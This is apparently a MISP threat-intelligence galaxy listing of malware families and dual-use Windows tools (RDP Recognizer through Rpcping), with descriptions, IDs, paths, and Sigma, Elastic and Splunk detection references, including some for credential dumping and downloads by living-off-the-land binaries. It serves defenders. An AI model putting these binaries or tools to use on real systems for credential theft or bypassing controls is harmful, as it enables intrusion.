RDP Recognizer is a tool that can be used to brute force RDP passwords and check for RDP vulnerabilities. U.S. authorities observed BianLian Ransomware Group actors downloading the tool during intrusions.[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID 22d9f7be-7447-4cce-90f0-67a13d4b6a82
which can be used as unique global reference for RDP Recognizer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5012 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
rdrleakdiag
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Windows resource leak diagnostic tool
Author: John Dwyer
Paths: * c:\windows\system32\rdrleakdiag.exe * c:\Windows\SysWOW64\rdrleakdiag.exe
Resources: * https://twitter.com/0gtweet/status/1299071304805560321?s=21 * https://www.pureid.io/dumping-abusing-windows-credentials-part-1/ * https://github.com/LOLBAS-Project/LOLBAS/issues/84
Detection: * Sigma: proc_creation_win_rdrleakdiag_process_dumping.yml * Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html * Elastic: credential_access_cmdline_dump_tool.toml[rdrleakdiag.exe - LOLBAS Project]
Internal MISP references
UUID 3b37c81a-9574-4ac3-a996-d4cfe1e3ddb1
which can be used as unique global reference for rdrleakdiag
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5147 |
source | Tidal Cyber |
tags | ['9fbc403c-bd2e-458a-a202-a65b8201e973', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Reaver
Reaver is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of Control Panel items.[Palo Alto Reaver Nov 2017]
Internal MISP references
UUID ca544771-d43e-4747-80e5-cf0f4a4836f3
which can be used as unique global reference for Reaver
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0172 |
source | MITRE |
type | ['malware'] |
RedLeaves
RedLeaves is a malware family used by menuPass. The code overlaps with PlugX and may be based upon the open source tool Trochilus. [PWC Cloud Hopper Technical Annex April 2017] [FireEye APT10 April 2017]
Internal MISP references
UUID 5264c3ab-14e1-4ae1-854e-889ebde029b4
which can be used as unique global reference for RedLeaves
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0153 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Reg
Reg is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. [Microsoft Reg]
Utilities such as Reg are known to be used by persistent threats. [Windows Commands JPCERT]
Internal MISP references
UUID d796615c-fa3d-4afd-817a-1a3db8c73532
which can be used as unique global reference for Reg
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0075 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ec4a7c87-051b-4b7d-8acc-03696fe2113e', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '8bf128ad-288b-41bc-904f-093f4fdde745', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Regasm
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Part of .NET
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Resources: * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
Detection: * Sigma: proc_creation_win_lolbin_regasm.yml * Elastic: execution_register_server_program_connecting_to_the_internet.toml * Splunk: suspicious_regsvcs_regasm_activity.md * Splunk: detect_regasm_with_network_connection.yml * IOC: regasm.exe executing dll file[LOLBAS Regasm]
Internal MISP references
UUID 1e892f4b-5398-44ac-aeb4-2e50f70c5716
which can be used as unique global reference for Regasm
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5148 |
source | Tidal Cyber |
tags | ['7d31d8f7-375b-4fb3-a631-51b42e58d95a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
RegDuke
RegDuke is a first stage implant written in .NET and used by APT29 since at least 2017. RegDuke has been used to control a compromised machine when control of other implants on the machine was lost.[ESET Dukes October 2019]
Internal MISP references
UUID 52dc08d8-82cc-46dc-91ae-383193d72963
which can be used as unique global reference for RegDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0511 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Regedit
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to manipulate registry
Author: Oddvar Moe
Paths: * C:\Windows\regedit.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_regedit_import_keys_ads.yml * IOC: regedit.exe reading and writing to alternate data stream * IOC: regedit.exe should normally not be executed by end-users[Regedit.exe - LOLBAS Project]
Internal MISP references
UUID 16cc6ff2-8804-4863-aede-40c4376e0af3
which can be used as unique global reference for Regedit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5149 |
source | Tidal Cyber |
tags | ['36affa3d-c949-4e1b-8667-299490580dd5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Regin
Regin is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some Regin timestamps date back to 2003. [Kaspersky Regin]
Internal MISP references
UUID e88bf527-bb9c-45c3-b86b-04a07dcd91fd
which can be used as unique global reference for Regin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0019 |
source | MITRE |
type | ['malware'] |
Regini
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to manipulate the registry
Author: Oddvar Moe
Paths: * C:\Windows\System32\regini.exe * C:\Windows\SysWOW64\regini.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_regini_ads.yml * Sigma: proc_creation_win_regini_execution.yml * IOC: regini.exe reading from ADS[Regini.exe - LOLBAS Project]
Internal MISP references
UUID 92457f9e-c2e6-4d61-b927-0d8ff0f6d617
which can be used as unique global reference for Regini
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5150 |
source | Tidal Cyber |
tags | ['288c6e19-cf6c-451a-aff3-547f371ff4ad', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Register-cimprovider
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to register new wmi providers
Author: Oddvar Moe
Paths: * C:\Windows\System32\Register-cimprovider.exe * C:\Windows\SysWOW64\Register-cimprovider.exe
Resources: * https://twitter.com/PhilipTsukerman/status/992021361106268161
Detection: * Sigma: proc_creation_win_susp_register_cimprovider.yml * IOC: Register-cimprovider.exe execution and cmdline DLL load may be supsicious[Register-cimprovider.exe - LOLBAS Project]
Internal MISP references
UUID c80bac89-6b63-4860-9f66-260976a184e8
which can be used as unique global reference for Register-cimprovider
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5151 |
source | Tidal Cyber |
tags | ['d379a1fb-1028-4986-ae6c-eb8cc068aa68', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Regsvcs
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
Author: Oddvar Moe
Paths: * c:\Windows\Microsoft.NET\Framework\v\regsvcs.exe * c:\Windows\Microsoft.NET\Framework64\v\regsvcs.exe
Resources: * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
Detection: * Sigma: proc_creation_win_lolbin_regasm.yml * Elastic: execution_register_server_program_connecting_to_the_internet.toml * Splunk: detect_regsvcs_with_network_connection.yml[LOLBAS Regsvcs]
Internal MISP references
UUID 271dd92b-76ee-4a00-ba41-343c32fc084e
which can be used as unique global reference for Regsvcs
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5152 |
source | Tidal Cyber |
tags | ['141e4dce-00be-4bd7-9f81-6202939f0359', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Regsvr32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to register dlls
Author: Oddvar Moe
Paths: * C:\Windows\System32\regsvr32.exe * C:\Windows\SysWOW64\regsvr32.exe
Resources: * https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md
Detection: * Sigma: proc_creation_win_regsvr32_susp_parent.yml * Sigma: proc_creation_win_regsvr32_susp_child_process.yml * Sigma: proc_creation_win_regsvr32_susp_exec_path_1.yml * Sigma: proc_creation_win_regsvr32_network_pattern.yml * Sigma: net_connection_win_regsvr32_network_activity.yml * Sigma: dns_query_win_regsvr32_network_activity.yml * Sigma: proc_creation_win_regsvr32_flags_anomaly.yml * Sigma: file_event_win_net_cli_artefact.yml * Splunk: detect_regsvr32_application_control_bypass.yml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Elastic: execution_register_server_program_connecting_to_the_internet.toml * IOC: regsvr32.exe retrieving files from Internet * IOC: regsvr32.exe executing scriptlet (sct) files * IOC: DotNet CLR libraries loaded into regsvr32.exe * IOC: DotNet CLR Usage Log - regsvr32.exe.log[LOLBAS Regsvr32]
Internal MISP references
UUID 533d2c42-45a7-456e-af75-b61e2aff98a7
which can be used as unique global reference for Regsvr32
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5153 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '32be7240-e5ea-4e8a-8e95-7c1bd7869754', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Remcos
Remcos is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. Remcos has been observed being used in malware campaigns.[Riskiq Remcos Jan 2018][Talos Remcos Aug 2018]
Internal MISP references
UUID 2eb92fa8-514e-4018-adc4-c9fe4f082567
which can be used as unique global reference for Remcos
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0332 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Remexi
Remexi is a Windows-based Trojan that was developed in the C programming language.[Securelist Remexi Jan 2019]
Internal MISP references
UUID 82d0bb4d-4711-49e3-9fe5-c522bbe5e8bb
which can be used as unique global reference for Remexi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0375 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Remote
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Paths: * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
Resources: * https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
Detection: * IOC: remote.exe process spawns * Sigma: proc_creation_win_lolbin_remote.yml[Remote.exe - LOLBAS Project]
Internal MISP references
UUID 3a1436e9-ce2c-449e-a670-c1b212ebd754
which can be used as unique global reference for Remote
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5234 |
source | Tidal Cyber |
tags | ['828f1559-b13d-4426-9dcf-5f601fcb6ff0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
RemoteCMD
RemoteCMD is a custom tool used by APT3 to execute commands on a remote system similar to SysInternal's PSEXEC functionality. [Symantec Buckeye]
Internal MISP references
UUID 57fa64ea-975a-470a-a194-3428148ae9ee
which can be used as unique global reference for RemoteCMD
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0166 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RemoteUtilities
RemoteUtilities is a legitimate remote administration tool that has been used by MuddyWater since at least 2021 for execution on target machines.[Trend Micro Muddy Water March 2021]
Internal MISP references
UUID 8a7fa0df-c688-46be-94bf-462fae33b788
which can be used as unique global reference for RemoteUtilities
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0592 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Remsec
Remsec is a modular backdoor that has been used by Strider and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. [Symantec Strider Blog]
Internal MISP references
UUID e3729cff-f25e-4c01-a7a1-e8b83e903b30
which can be used as unique global reference for Remsec
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0125 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Replace
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to replace file with another file
Author: Oddvar Moe
Paths: * C:\Windows\System32\replace.exe * C:\Windows\SysWOW64\replace.exe
Resources: * https://twitter.com/elceef/status/986334113941655553 * https://twitter.com/elceef/status/986842299861782529
Detection: * IOC: Replace.exe retrieving files from remote server * Sigma: proc_creation_win_lolbin_replace.yml[Replace.exe - LOLBAS Project]
Internal MISP references
UUID 19a04c82-f816-464c-b050-a57269cba157
which can be used as unique global reference for Replace
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5154 |
source | Tidal Cyber |
tags | ['accb4d24-4b40-41ce-ae2e-adcca7e80b41', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Responder
Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. [GitHub Responder]
Internal MISP references
UUID 2a5ea3a7-9873-4a2e-b4b5-4e27a80db305
which can be used as unique global reference for Responder
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0174 |
source | MITRE |
tags | ['af5e9be5-b86e-47af-91dd-966a5e34a186', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', '61cdbb28-cbfd-498b-9ab1-1f14337f9524', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Revenge RAT
Revenge RAT is a freely available remote access tool written in .NET (C#).[Cylance Shaheen Nov 2018][Cofense RevengeRAT Feb 2019]
Internal MISP references
UUID f99712b4-37a2-437c-92d7-fb4f94a1f892
which can be used as unique global reference for Revenge RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0379 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
REvil
REvil is a ransomware family that has been linked to the GOLD SOUTHFIELD group and operated as ransomware-as-a-service (RaaS) since at least April 2019. REvil, which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.[Secureworks REvil September 2019][Intel 471 REvil March 2020][Group IB Ransomware May 2020]
Internal MISP references
UUID 9314531e-bf46-4cba-9c19-198279ccf9cd
which can be used as unique global reference for REvil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0496 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '286918d5-0b48-4655-9118-907b53de0ee0', '93c53801-5427-4678-a753-7fc761e9eda1', '1138181b-b2cf-4b6b-82da-10867aa4089d', '00ec2407-cc63-4b62-b967-c3e06bdddd2f', '1cc90752-70a3-4a17-b370-e1473a212f79', '0e948c57-6c10-4576-ad27-9832cc2af3a1', '0ed7d10c-c65b-4174-9edb-446bf301d250', '1b98f09a-7d93-4abb-8f3e-1eacdb9f9871', 'ab64f2d8-8da3-48de-ac66-0fd91d634b22', 'c8ce7130-e134-492c-a98a-ed1d25b57e4c', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RGDoor
RGDoor is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. RGDoor has been seen deployed on webservers belonging to the Middle East government organizations. RGDoor provides backdoor access to compromised IIS servers. [Unit 42 RGDoor Jan 2018]
Internal MISP references
UUID d5649d69-52d4-4198-9683-b250348dea32
which can be used as unique global reference for RGDoor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0258 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rhysida Ransomware
Rhysida is a ransomware-as-a-service (RaaS) operation that has been active since May 2023, claiming attacks on multiple sectors in several countries in North and South America, Western Europe, and Australia. Many alleged victims are education sector entities. Security researchers have observed TTP and victimology overlaps with the Vice Society extortion group.[HC3 Analyst Note Rhysida Ransomware August 2023]
Internal MISP references
UUID f7c1e1cd-cc64-4417-92c3-76afed55d38c
which can be used as unique global reference for Rhysida Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5302 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rifdoor
Rifdoor is a remote access trojan (RAT) that shares numerous code similarities with HotCroissant.[Carbon Black HotCroissant April 2020]
Internal MISP references
UUID ca5ae7c8-467a-4434-82fc-db50ce3fc671
which can be used as unique global reference for Rifdoor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0433 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RIPTIDE
RIPTIDE is a proxy-aware backdoor used by APT12. [Moran 2014]
Internal MISP references
UUID 00fa4cc2-6f99-4b18-b927-689964ef57e1
which can be used as unique global reference for RIPTIDE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0003 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rising Sun
Rising Sun is a modular backdoor that was used extensively in Operation Sharpshooter between 2017 and 2019. Rising Sun infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed Rising Sun included some source code from Lazarus Group's Trojan Duuzer.[McAfee Sharpshooter December 2018]
Internal MISP references
UUID 19b1f1c8-5ef3-4328-b605-38e0bafc084d
which can be used as unique global reference for Rising Sun
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0448 |
source | MITRE |
type | ['malware'] |
ROADTools
ROADTools is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.[ROADtools Github]
Internal MISP references
UUID 15bc8e94-64d1-4f1f-bc99-08cfbac417dc
which can be used as unique global reference for ROADTools
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0684 |
source | MITRE |
tags | ['c9c73000-30a5-4a16-8c8b-79169f9c24aa'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
RobbinHood
RobbinHood is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.[CarbonBlack RobbinHood May 2019][BaltimoreSun RobbinHood May 2019]
Internal MISP references
UUID b65956ef-439a-463d-b85e-6606467f508a
which can be used as unique global reference for RobbinHood
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0400 |
source | MITRE |
tags | ['ce9f1048-09c1-49b0-a109-dd604afbf3cd', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
ROCKBOOT
ROCKBOOT is a Bootkit that has been used by an unidentified, suspected China-based group. [FireEye Bootkits]
Internal MISP references
UUID cb7aa34e-312f-4210-be7b-47a1e3f5b7b5
which can be used as unique global reference for ROCKBOOT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0112 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RogueRobin
RogueRobin is a payload used by DarkHydrus that has been developed in PowerShell and C#. [Unit 42 DarkHydrus July 2018][Unit42 DarkHydrus Jan 2019]
Internal MISP references
UUID 852cf78d-9cdc-4971-a972-405921027436
which can be used as unique global reference for RogueRobin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0270 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ROKRAT
ROKRAT is a cloud-based remote access tool (RAT) used by APT37 to target victims in South Korea. APT37 has used ROKRAT during several campaigns from 2016 through 2021.[Talos ROKRAT][Talos Group123][Volexity InkySquid RokRAT August 2021]
Internal MISP references
UUID a3479628-af0b-4088-8d2a-fafa384731dd
which can be used as unique global reference for ROKRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0240 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RomCom
RomCom is a custom backdoor believed to be developed and distributed by the Void Rabisu threat actor. It has been used in attacks that Trend Micro researchers assess to be geopolitically motivated.[Trend Micro Void Rabisu May 30 2023]
Internal MISP references
UUID 4af6326b-eba7-4446-83aa-8b98771d390f
which can be used as unique global reference for RomCom
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5295 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
RotaJakiro
RotaJakiro is a 64-bit Linux backdoor used by APT32. First seen in 2018, it uses a plugin architecture to extend capabilities. RotaJakiro can determine it's permission level and execute according to access type (root
or user
).[RotaJakiro 2021 netlab360 analysis][netlab360 rotajakiro vs oceanlotus]
Internal MISP references
UUID 169bfcf6-544c-5824-a7cd-2d5070304b57
which can be used as unique global reference for RotaJakiro
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S1078 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
route
route can be used to find or change information within the local system IP routing table. [TechNet Route]
Internal MISP references
UUID 3b755518-9085-474e-8bc4-4f9344d9c8af
which can be used as unique global reference for route
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0103 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Rover
Rover is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. [Palo Alto Rover]
Internal MISP references
UUID ef38ff3e-fa36-46f2-a720-3abaca167b04
which can be used as unique global reference for Rover
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0090 |
source | MITRE |
type | ['malware'] |
Royal
Royal is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. Royal employs partial encryption and multiple threads to evade detection and speed encryption. Royal has been used in attacks against multiple industries worldwide--including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in Royal and Conti attacks and noted a possible connection between their operators.[Microsoft Royal ransomware November 2022][Cybereason Royal December 2022][Kroll Royal Deep Dive February 2023][Trend Micro Royal Linux ESXi February 2023][CISA Royal AA23-061A March 2023]
Internal MISP references
UUID 221e24cb-910f-5988-9473-578ef350870c
which can be used as unique global reference for Royal
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1073 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Rpcping
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to verify rpc connection
Author: Oddvar Moe
Paths: * C:\Windows\System32\rpcping.exe * C:\Windows\SysWOW64\rpcping.exe
Resources: * https://github.com/vysec/RedTips * https://twitter.com/vysecurity/status/974806438316072960 * https://twitter.com/vysecurity/status/873181705024266241 * https://twitter.com/splinter_code/status/1421144623678988298
Detection: * Sigma: proc_creation_win_rpcping_credential_capture.yml[Rpcping.exe - LOLBAS Project]
Internal MISP references
UUID 3e42b791-fb59-4a8e-a27e-1cc544f353ee
which can be used as unique global reference for Rpcping
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5155 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Rsockstun
